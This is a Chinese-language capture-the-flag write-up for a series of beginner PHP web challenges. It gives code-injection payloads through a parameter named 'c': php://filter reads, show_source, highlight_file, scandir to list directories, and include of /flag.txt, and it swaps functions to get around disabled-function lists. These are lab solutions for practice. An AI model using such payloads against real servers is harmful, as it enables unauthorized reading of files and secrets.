@
目录
ctf - web入门
这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。
以下解法随便挑一个即可。可能不同题会有部分函数被禁。
payload1:
c=include "php://filter/read=convert.base64-encode/resource=flag.php";
payload2:
c=show_source('flag.php');
payload3:
c=file_get_contents('flag.php');
payload4:
c=highlight_file("flag.php");
题目没变化。
随便试一个函数。
根据提示,先扫一下根目录。
c=print_r(scandir('/'));
可得 payload:
c=highlight_file("/flag.txt");
PHP 中:
题目就不贴了。和前几题一模一样的。
区别在于,print_r()
函数被禁了。
那就用 var_dump()
函数。
c=var_dump(scandir('/'));
payload:
c=highlight_file("/flag.txt");
一上来就说 highlight_file() 函数被禁了。
先尝试扫一下根目录。
c=var_dump(scandir('/'));
那就使用 include() 函数将文件内容包含进来。
payload:
c=include("/flag.txt");
题目与 web68 一样。
但是 var_dump() 被禁了。
换一个函数即可。
c=var_export(scandir("/"));
payload:
c=include("/flag.txt");
看题,禁用了一堆函数。
但其实沿用 web69 的方法即可。
c=var_export(scandir("/"));
c=include("/flag.txt");
对这题来说没啥用的函数。
一笑出门去,千里落花风。
——《水调歌头 · 我饮不须劝》(宋)辛弃疾
手机扫一扫
移动阅读更方便
你可能感兴趣的文章